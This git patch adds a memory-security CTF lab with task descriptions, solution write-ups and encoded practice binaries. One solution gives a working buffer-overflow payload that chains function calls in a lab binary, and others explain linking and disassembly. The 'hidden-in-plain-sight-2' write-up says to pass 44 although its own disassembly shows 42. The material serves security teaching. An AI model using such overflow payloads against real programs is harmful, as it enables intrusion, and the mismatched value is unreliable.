From ae57d782c579b95cd41b678960c1a330ae0cd1f4 Mon Sep 17 00:00:00 2001
From: Dimitrie Valu <valu.d54@gmail.com>
Date: Thu, 29 Aug 2024 05:30:38 +0300
Subject: [PATCH] chapters/memory-security/ctf: Add CTF lab

This commit adds the adapted material, including references and sentence
rephrasing for enhanced readability, as well as solution writeups.

Signed-off-by: Dimitrie Valu <valu.d54@gmail.com>
---
 .../drills/tasks/feeling-chained/README.md    |   7 ++++
 .../tasks/feeling-chained/solution/README.md  |   7 ++++
 .../tasks/feeling-chained/support/buff-ovf3   | Bin 0 -> 10392 bytes
 .../tasks/hidden-in-plain-sight-1/README.md   |   7 ++++
 .../solution/README.md                        |  11 +++++++
 .../hidden-in-plain-sight-1/solution/main.c   |  10 ++++++
 .../hidden-in-plain-sight-1/support/link      | Bin 0 -> 4772 bytes
 .../tasks/hidden-in-plain-sight-2/README.md   |   7 ++++
 .../solution/README.md                        |  30 ++++++++++++++++++
 .../hidden-in-plain-sight-2/solution/main.c   |  10 ++++++
 .../hidden-in-plain-sight-2/support/link2     | Bin 0 -> 5060 bytes
 .../drills/tasks/indirect-business/README.md  |   8 +++++
 .../indirect-business/solution/README.md      |   6 ++++
 .../tasks/indirect-business/support/buff-ovf  | Bin 0 -> 10220 bytes
 .../ctf/drills/tasks/look-at-him-go/README.md |   7 ++++
 .../tasks/look-at-him-go/solution/README.md   |   4 +++
 .../tasks/look-at-him-go/support/dynamic      | Bin 0 -> 10284 bytes
 .../ctf/drills/tasks/playing-god/README.md    |   6 ++++
 .../tasks/playing-god/solution/README.md      |   4 +++
 .../drills/tasks/playing-god/support/dynamic2 | Bin 0 -> 9976 bytes
 .../drills/tasks/rip-my-buffers-off/README.md |   6 ++++
 .../rip-my-buffers-off/solution/README.md     |   6 ++++
 .../rip-my-buffers-off/support/buff-ovf2      | Bin 0 -> 10292 bytes
 .../ctf/drills/tasks/rop/README.md            |  11 +++++++
 .../ctf/drills/tasks/rop/solution/README.md   |  14 ++++++++
 .../ctf/drills/tasks/rop/support/rop          | Bin 0 -> 11632 bytes
 .../memory-security/ctf/reading/README.md     |  13 ++++++++
 config.yaml                                   |  19 +++++++++++
 28 files changed, 193 insertions(+)
 create mode 100644 chapters/memory-security/ctf/drills/tasks/feeling-chained/README.md
 create mode 100644 chapters/memory-security/ctf/drills/tasks/feeling-chained/solution/README.md
 create mode 100644 chapters/memory-security/ctf/drills/tasks/feeling-chained/support/buff-ovf3
 create mode 100644 chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-1/README.md
 create mode 100644 chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-1/solution/README.md
 create mode 100644 chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-1/solution/main.c
 create mode 100644 chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-1/support/link
 create mode 100644 chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-2/README.md
 create mode 100644 chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-2/solution/README.md
 create mode 100644 chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-2/solution/main.c
 create mode 100644 chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-2/support/link2
 create mode 100644 chapters/memory-security/ctf/drills/tasks/indirect-business/README.md
 create mode 100644 chapters/memory-security/ctf/drills/tasks/indirect-business/solution/README.md
 create mode 100644 chapters/memory-security/ctf/drills/tasks/indirect-business/support/buff-ovf
 create mode 100644 chapters/memory-security/ctf/drills/tasks/look-at-him-go/README.md
 create mode 100644 chapters/memory-security/ctf/drills/tasks/look-at-him-go/solution/README.md
 create mode 100644 chapters/memory-security/ctf/drills/tasks/look-at-him-go/support/dynamic
 create mode 100644 chapters/memory-security/ctf/drills/tasks/playing-god/README.md
 create mode 100644 chapters/memory-security/ctf/drills/tasks/playing-god/solution/README.md
 create mode 100644 chapters/memory-security/ctf/drills/tasks/playing-god/support/dynamic2
 create mode 100644 chapters/memory-security/ctf/drills/tasks/rip-my-buffers-off/README.md
 create mode 100644 chapters/memory-security/ctf/drills/tasks/rip-my-buffers-off/solution/README.md
 create mode 100644 chapters/memory-security/ctf/drills/tasks/rip-my-buffers-off/support/buff-ovf2
 create mode 100644 chapters/memory-security/ctf/drills/tasks/rop/README.md
 create mode 100644 chapters/memory-security/ctf/drills/tasks/rop/solution/README.md
 create mode 100644 chapters/memory-security/ctf/drills/tasks/rop/support/rop
 create mode 100644 chapters/memory-security/ctf/reading/README.md

diff --git a/chapters/memory-security/ctf/drills/tasks/feeling-chained/README.md b/chapters/memory-security/ctf/drills/tasks/feeling-chained/README.md
new file mode 100644
index 00000000..f119168c
--- /dev/null
+++ b/chapters/memory-security/ctf/drills/tasks/feeling-chained/README.md
@@ -0,0 +1,7 @@
+# Feeling chained
+
+Follow the sequence of operations in the functions of the binary at `feeling-chained/buff-ovf3`.
+Identify the necessary ones and... you already know how to call them.
+
+If you cannot find your way through this exercise, look for variables that you need to overwrite with specific values in order to finish the exploit, and think of their positioning on the stack.
+The previously mentioned [online example](https://medium.com/@0x-Singularity/exploit-tutorial-understanding-buffer-overflows-d017108edc85) is still highly relevant.
diff --git a/chapters/memory-security/ctf/drills/tasks/feeling-chained/solution/README.md b/chapters/memory-security/ctf/drills/tasks/feeling-chained/solution/README.md
new file mode 100644
index 00000000..478790f8
--- /dev/null
+++ b/chapters/memory-security/ctf/drills/tasks/feeling-chained/solution/README.md
@@ -0,0 +1,7 @@
+# Solution
+
+By using the buffer overflow in `gateway()`, functions `f1(56, 13)` and `f3(13)` need to be called in this order, with those exact parameters.
+`f3` is the one that actually calls `get_flag()`.
+Calling `get_flag()` directly shouldn't work (a global variable is checked to make sure all steps were made).
+
+`python3 -c 'import sys; sys.stdout.buffer.write(b"A"*22 + b"\xa6\x86\x04\x08" + b"\x51\x86\x04\x08" + b"\x38\x00\x00\x00" + b"\x0d\x00\x00\x00")' | ./buff-ovf3`
diff --git a/chapters/memory-security/ctf/drills/tasks/feeling-chained/support/buff-ovf3 b/chapters/memory-security/ctf/drills/tasks/feeling-chained/support/buff-ovf3
new file mode 100644
index 0000000000000000000000000000000000000000..491ff9993542683976c85896a56731c335ce308c
GIT binary patch
literal 10392
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

literal 0
HcmV?d00001

diff --git a/chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-1/README.md b/chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-1/README.md
new file mode 100644
index 00000000..a8723282
--- /dev/null
+++ b/chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-1/README.md
@@ -0,0 +1,7 @@
+# Hidden in plain sight
+
+The `link` binary provides everything you need.
+Find a way to use it.
+> **TIP:** If you want a main function to be done right, you gotta do it yourself.
+
+If you are having trouble solving this exercise, check [this](https://stackoverflow.com/questions/15441877/how-do-i-link-object-files-in-c-fails-with-undefined-symbols-for-architecture).
diff --git a/chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-1/solution/README.md b/chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-1/solution/README.md
new file mode 100644
index 00000000..f3991313
--- /dev/null
+++ b/chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-1/solution/README.md
@@ -0,0 +1,11 @@
+# Solution
+
+Looking at the disassembly of the `link` binary, it is noticeable that there is no `main` function.
+This is a clear indicator that we have to find a way to call it ourselves.
+
+We define a `get_flag()` function prototype as void (you may be able to skip this step, but there will be an implicit declaration error during compilation) and we call it in our main function.
+We then compile and assemble the file:
+`gcc -g -m32 -z execstack -fno-PIC -fno-stack-protector -c main.c`
+
+We then link it to the `link` binary:
+`gcc -no-pie -m32 link main.o -o a.out`
diff --git a/chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-1/solution/main.c b/chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-1/solution/main.c
new file mode 100644
index 00000000..43bf51e8
--- /dev/null
+++ b/chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-1/solution/main.c
@@ -0,0 +1,10 @@
+// SPDX-License-Identifier: BSD-3-Clause
+
+void get_flag(void);
+
+int main(void)
+{
+	get_flag();
+	return 0;
+}
+
diff --git a/chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-1/support/link b/chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-1/support/link
new file mode 100644
index 0000000000000000000000000000000000000000..bf93bb5d43ceb3d16f898ec6d28af0a426a6b27e
GIT binary patch
literal 4772
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

literal 0
HcmV?d00001

diff --git a/chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-2/README.md b/chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-2/README.md
new file mode 100644
index 00000000..8d0ea8f4
--- /dev/null
+++ b/chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-2/README.md
@@ -0,0 +1,7 @@
+# Hidden in plain sight 2
+
+Analyze the `link2` binary.
+Executing it is no longer a mystery, but it will be a bit more challenging to reach the flag.
+> **TIP:** Not all functions are private.
+
+In case you get stuck, feel free to take a look at [this](https://stackoverflow.com/questions/60261705/why-functions-locals-and-arguments-are-pushed-to-the-stack)!
diff --git a/chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-2/solution/README.md b/chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-2/solution/README.md
new file mode 100644
index 00000000..cd87c482
--- /dev/null
+++ b/chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-2/solution/README.md
@@ -0,0 +1,30 @@
+# Solution
+
+In a nature similar to that of the previous exercise, we take a close look at the `objdump` disassembly output of the binary using the `objdump -D -M intel link2` command, specifically focusing on the `helper` function:
+
+```asm
+0000012b <helper>:
+(...)
+137: 83 7d 08 2a                   cmp     dword ptr [ebp + 8], 42
+13b: 75 0d                         jne     0x14a <helper+0x1f>
+13d: 80 7d f4 58                   cmp     byte ptr [ebp - 12], 88
+141: 75 07                         jne     0x14a <helper+0x1f>
+143: e8 b8 fe ff ff                call    0x0 <get_flag>
+```
+
+The first `cmp` instruction at `0x137` compares the value at `[ebp + 8]` with `42`.
+This implies that the first argument passed to the helper function is expected to be `42`.
+The second `cmp` instruction at `0x13d` compares the value at `[ebp - 12]` with `88`.
+Since it's comparing a single byte (`byte ptr`), we can infer that this corresponds to a `char` argument.
+Although it appears to be a local variable, if we look around a bit, we will notice why that is:
+
+```asm
+131: 8b 45 0c                      mov     eax, dword ptr [ebp + 12]
+134: 88 45 f4                      mov     byte ptr [ebp - 12], al
+```
+
+The value at `[ebp + 12]` is moved into the `eax` register - this corresponds to the second argument passed to the `helper` function.
+The lower byte of `eax`, `al`, the `char` that we are interested in, is then moved into a local variable.
+
+If both of the aforementioned comparisons are successful, the `get_flag` function is called.
+Hence, we can infer that we need to call the `helper` function using the two arguments above - the integer `44`, and the char `X`, which is `88` in decimal.
